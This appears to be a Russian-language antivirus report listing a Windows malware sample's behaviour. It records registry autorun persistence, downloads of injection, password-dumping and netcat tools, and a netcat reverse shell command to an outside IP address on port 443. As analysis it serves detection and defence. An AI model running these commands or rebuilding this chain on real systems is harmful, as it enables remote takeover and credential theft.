Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'denwz' = '<SYSTEM32>\lssas.exe'
- '%TEMP%\syringe.exe' (загружен из сети Интернет)
- '%TEMP%\fgdump.exe' (загружен из сети Интернет)
- '%TEMP%\nc.exe' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\rm.bat
- '<SYSTEM32>\ping.exe' -n 2 127.0.0.1
- '%TEMP%\syringe.exe' -1 tekdefense.dll 1416
- '%TEMP%\nc.exe' -e cmd.exe 116.213.80.112 443
- '%TEMP%\fgdump.exe'
- %TEMP%\syringe.exe
- %TEMP%\tekdefense.dll
- %TEMP%\rm.bat
- <SYSTEM32>\lssas.exe
- %TEMP%\nc.exe
- %TEMP%\fgdump.exe
- 'www.te###fense.com':80
- 'to###.#ackarmoury.com':80
- http://to###.#ackarmoury.com/all_binaries/syringe.exe
- http://www.te###fense.com/storage/samples/tekdefense.dll
- http://to###.#ackarmoury.com/all_binaries/nc.exe
- http://to###.#ackarmoury.com/all_binaries/fgdump.exe
- DNS ASK www.te###fense.com
- DNS ASK to###.#ackarmoury.com
- ClassName: 'Indicator' WindowName: ''